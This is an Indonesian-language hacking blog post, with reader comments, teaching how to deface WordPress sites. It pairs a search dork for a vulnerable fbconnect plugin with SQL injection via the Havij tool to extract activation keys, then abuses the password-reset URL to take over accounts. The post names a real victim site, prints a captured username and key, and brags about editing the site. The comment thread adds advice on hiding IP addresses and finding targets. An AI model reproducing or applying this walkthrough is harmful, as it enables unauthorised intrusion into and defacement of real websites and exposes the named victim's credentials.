Hack WordPress (SQL Injection + Reset Password) merupakan salah satu cara yang dapat kita gunakan untuk mendeface Blog WordPress. Okeh karena caranya disini lumayan panjang jadi gak usah basa-basi dulu deh langsung aja kita mulai🙂
Pertama kita siapin dulu bahan-bahan yang dibutuhkan demi lancarnya aksi kita kali ini, hehe..

    1. Kompie terhubung internet
    2. Havij (maklum lammer jadi masih pake tool, yang dewa manual aja yah)
    3. dork: inurl:?fbconnect_action=myhome ( kreasi lagi yaa )

  1. Kesabaran dalam mencari target
  2. Kopi dan musik yang kuenceng ( disarankan alirannya Rock,Metal ) hehehe
saya beri contoh satu korban yaitu http://www.40sale.com/?fbconnect_action=myhome&userid=14 pada bagian “userid=” di tambahin tulisan ” fb” jadi bentuknya seperti ini http://www.40sale.com/?fbconnect_action=myhome&fbuserid=14
kalau udah scan dengan Havij dan cari tabel wp_user atau yang berhubungan dengan user lah,kalau udah ketemu cari column user_login dan user_activation_key
heheh…dah ketemu tuh yang kita cari,
username:pico
Activation key: GBasuGIZFtbUjpP3MvWb
sekarang kita gunakan exploitnya yaitu
wp-login.php?action=rp&key=“kode aktivasi”&login=“user login”
sampailah kita ke tahap me-reset password korban heheh,kalau udah direset kita tinggal login dan melakukan sekehendak kita
saya cukup ngedit home.php nya aja dah,hehehe
buseeeet hasilnya kelam banget dah…sory ya min
sumberSumberWikipedia: Sumber is the capital of the Cire
Comments
  1. alysa02 says:

    mantap gan, ijin coba dulunih triknya🙂

  2. nisa says:

    ikutan blajar ya…

  3. boy21 says:

    itu kogh gk pkk kyk HIDE ip gk p” emngnya…
    newbie bngt nich gan, tolong ajarin y…

  4. boy21 says:

    ow gitu…
    trus klo masnya sebelumdeface web apa aja persiapannya..
    misal kyk hide ip, atau semacam anonymusly…
    Maaf sblmnya mas klo saya banyak nanya” soalnya saya masih bljar..
    drpd saya gk nanya tp ntar mlh sesat di jalan…😀

    • ya banyak ko software buat hide ip cuma sesuaikan aja ma os yg kita gunakan, yang paling gampang ya kita bisa pake add-ons firefox yaitu anonymox, firefox itu browser yg paling sesuai buat hacking karena byak add-ons yg bisa kita gunakan utk memudahkan proses hacking, misal kita ingin hack web dengan sql maka kita bisa gunakan add-ons sql inject me

  5. boy21 says:

    OK mas…
    saya cobak dulu… 😀
    klo kyk tor yg di BT anda udah mencobakah…
    tp klo SQL inject pkk software, berarti kita harus instal hide ip y…
    apa da cara lain…??
    😀

  6. revan says:

    om ini ane coba terus reset admin.a masuk ke email.a :3
    saran om😀

  7. ahmad habibi says:

    donwload havij nya di mana min? maklum newbi

  8. boy21 says:

    mas klo saya ada target nich y misalnya…
    http://www.target.com...
    trus saya mau caro dorknya gmn y caranya, target di atas ini pakai wordpress…
    mohon pencerahannya masih newbie bngt nich,,

    • gini kalo kita pake cara ini, kita gak bisa milih target sesuai keinginan walopun itu wordpress, yang perlu diingat adalah kita bisa milih target kalo emang wordpress tersebut muncul di hasil pencarian google pake dork diatas.

  9. Gun says:

    aku minta scrip html nya yg buat tmpiln tu hackernya gan…

  10. Man Hcmc says:

    o ya. saya mau tanya. bila kita sudah dapat nama login nya. pilih mana satu ya? kok. ada banyak user login.

  11. steven says:

    Bisa nggak kalau mengetahui password akun twitter?

  12. agelia17 says:

    teknik ini sudah ga bisa ..
    sekarang kalo lupa password langsung di kirim ke email ..

  13. Klo gak ada User_activation_code Gimana??

  14. Check your e-mail for your new password. <<< Gimana tuh???

  15. ariel daud says:

    gan dapet dari mana /?fbconnect_action=myhome&fbuserid=14

Silakan Komentar Jika Kurang Jelas

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s